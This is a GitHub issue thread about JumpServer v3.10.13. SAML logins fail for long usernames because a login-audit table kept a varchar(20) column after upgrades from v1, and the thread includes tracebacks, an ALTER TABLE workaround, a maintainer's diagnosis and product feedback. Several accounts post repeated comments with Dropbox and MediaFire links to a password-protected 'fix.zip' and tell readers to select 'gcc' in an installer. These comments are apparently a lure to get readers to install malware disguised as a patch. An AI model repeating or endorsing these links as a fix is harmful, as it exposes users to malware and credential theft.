### ISSUE TITLE
[Bug] 数据表字段类型不一致导致登录失败

### ISSUE THREAD

**Issue by HuanMeng0** [jumpserver/jumpserver#14023]
### 产品版本

v3.10.13

### 版本类型

- [X] 社区版
- [ ] 企业版
- [ ] 企业试用版

### 安装方式

- [X] 在线安装 (一键命令安装)
- [X] 离线包安装
- [ ] All-in-One
- [ ] 1Panel
- [ ] Kubernetes
- [ ] 源码安装

### 环境信息

Docker 部署，从v1 升级到  v2 ，再升级到 v3 的

### 🐛 缺陷描述

audits_userloginlog 和 users_user 的username字段长度不一致，会导致用户名长度大于20的用户登录失败。

细节：
```
mysql> describe users_user;
+----------------------------+--------------+------+-----+---------+-------+
| Field                      | Type         | Null | Key | Default | Extra |
+----------------------------+--------------+------+-----+---------+-------+
| password                   | varchar(128) | NO   |     | NULL    |       |
| last_login                 | datetime(6)  | YES  |     | NULL    |       |
| first_name                 | varchar(150) | NO   |     | NULL    |       |
| last_name                  | varchar(150) | NO   |     | NULL    |       |
| is_active                  | tinyint(1)   | NO   |     | NULL    |       |
| date_joined                | datetime(6)  | NO   |     | NULL    |       |
| id                         | char(32)     | NO   | PRI | NULL    |       |
| username                   | varchar(128) | NO   | UNI | NULL    |       |
| name                       | varchar(128) | NO   |     | NULL    |       |
| email                      | varchar(128) | NO   | UNI | NULL    |       |
| role                       | varchar(10)  | NO   |     | NULL    |       |
| avatar                     | varchar(100) | YES  |     | NULL    |       |
| wechat                     | varchar(256) | NO   |     | NULL    |       |
| phone                      | varchar(256) | YES  |     | NULL    |       |
| private_key                | longtext     | YES  |     | NULL    |       |
| public_key                 | longtext     | YES  |     | NULL    |       |
| comment                    | longtext     | YES  |     | NULL    |       |
| is_first_login             | tinyint(1)   | NO   |     | NULL    |       |
| date_expired               | datetime(6)  | YES  | MUL | NULL    |       |
| created_by                 | varchar(30)  | NO   |     | NULL    |       |
| otp_secret_key             | varchar(256) | YES  |     | NULL    |       |
| mfa_level                  | smallint(6)  | NO   |     | NULL    |       |
| source                     | varchar(30)  | NO   |     | NULL    |       |
| date_password_last_updated | datetime(6)  | YES  |     | NULL    |       |
| need_update_password       | tinyint(1)   | NO   |     | NULL    |       |
| dingtalk_id                | varchar(128) | YES  | UNI | NULL    |       |
| wecom_id                   | varchar(128) | YES  | UNI | NULL    |       |
| feishu_id                  | varchar(128) | YES  | UNI | NULL    |       |
| is_service_account         | tinyint(1)   | NO   |     | NULL    |       |
| date_updated               | datetime(6)  | NO   |     | NULL    |       |
| updated_by                 | varchar(30)  | NO   |     | NULL    |       |
| date_api_key_last_used     | datetime(6)  | YES  |     | NULL    |       |
| slack_id                   | varchar(128) | YES  | UNI | NULL    |       |
| lark_id                    | varchar(128) | YES  | UNI | NULL    |       |
+----------------------------+--------------+------+-----+---------+-------+
34 rows in set (0.00 sec)

mysql> describe audits_userloginlog;
+------------+--------------+------+-----+---------+-------+
| Field      | Type         | Null | Key | Default | Extra |
+------------+--------------+------+-----+---------+-------+
| id         | char(32)     | NO   | PRI | NULL    |       |
| username   | varchar(20)  | NO   |     | NULL    |       |
| type       | varchar(2)   | NO   |     | NULL    |       |
| ip         | char(39)     | NO   |     | NULL    |       |
| city       | varchar(254) | YES  |     | NULL    |       |
| user_agent | varchar(254) | YES  |     | NULL    |       |
| datetime   | datetime(6)  | NO   | MUL | NULL    |       |
| mfa        | smallint(6)  | NO   |     | NULL    |       |
| reason     | varchar(128) | NO   |     | NULL    |       |
| status     | tinyint(1)   | NO   |     | NULL    |       |
| backend    | varchar(32)  | NO   |     | NULL    |       |
+------------+--------------+------+-----+---------+-------+
11 rows in set (0.00 sec)

mysql>
```

错误日志：
```
2024-08-26 10:50:23 [ERRO] Internal Server Error: /core/auth/saml2/callback/
Traceback (most recent call last):
  File "/opt/py3/lib/python3.11/site-packages/django/db/backends/utils.py", line 89, in _execute
    return self.cursor.execute(sql, params)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/py3/lib/python3.11/site-packages/django/db/backends/mysql/base.py", line 75, in execute
    return self.cursor.execute(query, args)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/py3/lib/python3.11/site-packages/MySQLdb/cursors.py", line 179, in execute
    res = self._query(mogrified_query)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/py3/lib/python3.11/site-packages/MySQLdb/cursors.py", line 330, in _query
    db.query(q)
  File "/opt/py3/lib/python3.11/site-packages/MySQLdb/connections.py", line 255, in query
    _mysql.connection.query(self, query)
MySQLdb.DataError: (1406, "Data too long for column 'username' at row 1")

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/opt/py3/lib/python3.11/site-packages/asgiref/sync.py", line 518, in thread_handler
    raise exc_info[1]
  File "/opt/py3/lib/python3.11/site-packages/django/core/handlers/exception.py", line 43, in inner
    response = await get_response(request)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/py3/lib/python3.11/site-packages/asgiref/sync.py", line 518, in thread_handler
    raise exc_info[1]
  File "/opt/py3/lib/python3.11/site-packages/django/core/handlers/base.py", line 253, in _get_response_async
    response = await wrapped_callback(
               ^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/py3/lib/python3.11/site-packages/asgiref/sync.py", line 468, in __call__
    ret = await asyncio.shield(exec_coro)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/py3/lib/python3.11/site-packages/asgiref/current_thread_executor.py", line 40, in run
    result = self.fn(*self.args, **self.kwargs)
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/py3/lib/python3.11/site-packages/asgiref/sync.py", line 522, in thread_handler
    return func(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/contextlib.py", line 81, in inner
    return func(*args, **kwds)
           ^^^^^^^^^^^^^^^^^^^
  File "/opt/py3/lib/python3.11/site-packages/django/views/generic/base.py", line 103, in view
    return self.dispatch(request, *args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/py3/lib/python3.11/site-packages/django/views/decorators/csrf.py", line 55, in wrapped_view
    return view_func(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/jumpserver/apps/authentication/backends/saml2/views.py", line 288, in dispatch
    return super().dispatch(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/py3/lib/python3.11/site-packages/django/views/generic/base.py", line 142, in dispatch
    return handler(request, *args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/jumpserver/apps/authentication/backends/saml2/views.py", line 274, in post
    user = auth.authenticate(request=request, saml_user_data=saml_user_data)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/jumpserver/apps/authentication/mixins.py", line 72, in authenticate
    user = backend.authenticate(request, **credentials)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/jumpserver/apps/authentication/backends/saml2/backends.py", line 58, in authenticate
    user_auth_success.send(
  File "/opt/py3/lib/python3.11/site-packages/django/dispatch/dispatcher.py", line 176, in send
    return [
           ^
  File "/opt/py3/lib/python3.11/site-packages/django/dispatch/dispatcher.py", line 177, in <listcomp>
    (receiver, receiver(signal=self, sender=sender, **named))
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/jumpserver/apps/authentication/signal_handlers.py", line 49, in on_user_login_success
    post_auth_success.send(sender, user=user, request=request)
  File "/opt/py3/lib/python3.11/site-packages/django/dispatch/dispatcher.py", line 176, in send
    return [
           ^
  File "/opt/py3/lib/python3.11/site-packages/django/dispatch/dispatcher.py", line 177, in <listcomp>
    (receiver, receiver(signal=self, sender=sender, **named))
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/jumpserver/apps/audits/signal_handlers/login_log.py", line 130, in on_user_auth_success
    instance = write_login_log(**data)
               ^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/jumpserver/apps/audits/utils.py", line 28, in write_login_log
    return UserLoginLog.objects.create(**kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/py3/lib/python3.11/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/py3/lib/python3.11/site-packages/django/db/models/query.py", line 671, in create
    obj.save(force_insert=True, using=self.db)
  File "/opt/py3/lib/python3.11/site-packages/django/db/models/base.py", line 812, in save
    self.save_base(
  File "/opt/py3/lib/python3.11/site-packages/django/db/models/base.py", line 863, in save_base
    updated = self._save_table(
              ^^^^^^^^^^^^^^^^^
  File "/opt/py3/lib/python3.11/site-packages/django/db/models/base.py", line 1006, in _save_table
    results = self._do_insert(
              ^^^^^^^^^^^^^^^^
  File "/opt/py3/lib/python3.11/site-packages/django/db/models/base.py", line 1047, in _do_insert
    return manager._insert(
           ^^^^^^^^^^^^^^^^
  File "/opt/py3/lib/python3.11/site-packages/django/db/models/manager.py", line 85, in manager_method
    return getattr(self.get_queryset(), name)(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/py3/lib/python3.11/site-packages/django/db/models/query.py", line 1791, in _insert
    return query.get_compiler(using=using).execute_sql(returning_fields)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/py3/lib/python3.11/site-packages/django/db/models/sql/compiler.py", line 1660, in execute_sql
    cursor.execute(sql, params)
  File "/opt/py3/lib/python3.11/site-packages/django/db/backends/utils.py", line 67, in execute
    return self._execute_with_wrappers(
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/py3/lib/python3.11/site-packages/django/db/backends/utils.py", line 80, in _execute_with_wrappers
    return executor(sql, params, many, context)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/py3/lib/python3.11/site-packages/django/db/backends/utils.py", line 84, in _execute
    with self.db.wrap_database_errors:
  File "/opt/py3/lib/python3.11/site-packages/django/db/utils.py", line 91, in __exit__
    raise dj_exc_value.with_traceback(traceback) from exc_value
  File "/opt/py3/lib/python3.11/site-packages/django/db/backends/utils.py", line 89, in _execute
    return self.cursor.execute(sql, params)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/py3/lib/python3.11/site-packages/django/db/backends/mysql/base.py", line 75, in execute
    return self.cursor.execute(query, args)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/py3/lib/python3.11/site-packages/MySQLdb/cursors.py", line 179, in execute
    res = self._query(mogrified_query)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/opt/py3/lib/python3.11/site-packages/MySQLdb/cursors.py", line 330, in _query
    db.query(q)
  File "/opt/py3/lib/python3.11/site-packages/MySQLdb/connections.py", line 255, in query
    _mysql.connection.query(self, query)
django.db.utils.DataError: (1406, "Data too long for column 'username' at row 1")
```

可以通过以下SQL命令暂时解决问题：
```
alter table audits_userloginlog modify username varchar(128);
```

### 复现步骤

以 SAML协议登录一个用户名较长的用户。

### 期望结果

可以登录成功。

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by BaiJiangJie** [comment]
这个在很早的版本就修改了，v1 的时候。

https://github.com/jumpserver/jumpserver/commit/f87e08efffb9095971692c60e898ac2489d47c55#diff-e8956e0e7530551e670846c5ec730d9f44fb3e5293db37504c62504f33058a5aL70-R72

你是不是中间迁移表结构没有成功？

**Comment by BaiJiangJie** [comment]
这样临时解决也可以。

**Comment by HuanMeng0** [comment]
有可能是。这套环境用很久了，从v1就开始用了。
确实之前有升级的时候迁移失败的情况，不过不影响使用就没管。

**Comment by BaiJiangJie** [comment]
好的，那就先用着就可以了。

**Comment by HuanMeng0** [comment]
> 好的，那可是老用户了😁，估计使用 JumpServer 至少也有5、6年的时间了吧。
> 
> 从 JumpServer v1 到 v3，再到最新的 v4。功能方面，你觉得好用的或者不太好用的地方有哪些？想听听你的感受。
> 
> @HuanMeng0

1. 账户体系

v3的账户体系还是很不习惯，每个资产都有独立的账户使得管理成本提高了很多。

「账户管理」、「账户列表」下的「模板添加」功能很难用，只能选中资产，不能选「组」或者「标签」等具备一对多能力的资源。导致升级上来后，需要重复操作很多次来重新绑定账户到资产，因为升级迁移代码生成的账户用不了，总是认证失败。这个功能的代码效率似乎也有点问题，提交10个左右的资产会卡一下，提交100个左右就没响应了。

「模板添加」的界面设计在v4下是开倒车，连选择资产的对话框都没有了，只剩下一个下拉菜单。

2. Luna

v2版本下，右键点击资产是有「文件管理」入口的，现在这个入口收纳到了单击资产所弹出的对话框里，步骤多了。希望右键菜单里能直接选择连接方式，让用户自行选择是用对话框还是右键菜单。

多选资产登录，对话框会重复弹出，弹出一次比较好。

3. Koko

在「文件管理」功能下，认证失败时，koko没有相关提示产生。

**Comment by BaiJiangJie** [comment]
好的，感谢您的提交的宝贵建议，下面我针对你的问题简单描述一下功能设计的初衷和考虑的情况：

1. v3+ 版本的账户体系，相比v2版本的系统用户管理策略，对于管理员来讲确实繁琐一些。但是针对大规模资产账号的情况下，系统用户的配置往往会出现密码混淆的问题，所以为了面向未来大规模资产管理的情况，做了账号体系的设计。同时，为了平衡之前系统用户和现有账号体系之间的灵活性和可靠性，增加了账号模版的功能。即，以前使用系统用户可以在授权中一步完成的管理，现在需要以账号模版为媒介来完成。尽可能的同时保证了批量添加账号，又保证了账号密码的稳定和可靠性，其实后者更重要。v4 版本的模版管理确实有一些问题，将来可以在这一块做更好的优化。

2. Luna 页面的资产连接，因为资产类型和连接的协议越来越多，所以考虑了将文件管理合并起来的方式。针对老用户可能用起来没有之前便捷，但是面向未来统一的连接入口可能是学习成本最低的方式。多选资产登录的机制，由于现在的连接策略是 iframe 单独渲染的每一个资产会话，从连接到完成都是独立的一套流程，所以连接的前期将所有资产连接信息合并比较困难。后期会考虑一下如何优化。

3. 文件管理的认证失败报错信息后期看看能不能提示出来，这块可能获取不到错误信息。

**Comment by shsjshentao** [comment]
V4模板管理 “批量添加还需要一个一个选资产” 这个有优化预期时间吗？

**Comment by BaiJiangJie** [comment]
暂时没有。

> V4模板管理 “批量添加还需要一个一个选资产” 这个有优化预期时间吗？
